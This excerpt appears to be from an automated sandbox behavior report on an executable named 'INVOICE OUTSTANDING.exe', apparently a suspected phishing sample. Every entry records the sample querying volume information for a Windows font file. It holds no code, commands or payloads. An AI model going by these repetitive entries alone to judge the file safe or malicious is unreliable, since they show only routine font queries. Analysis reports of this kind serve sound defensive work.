            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
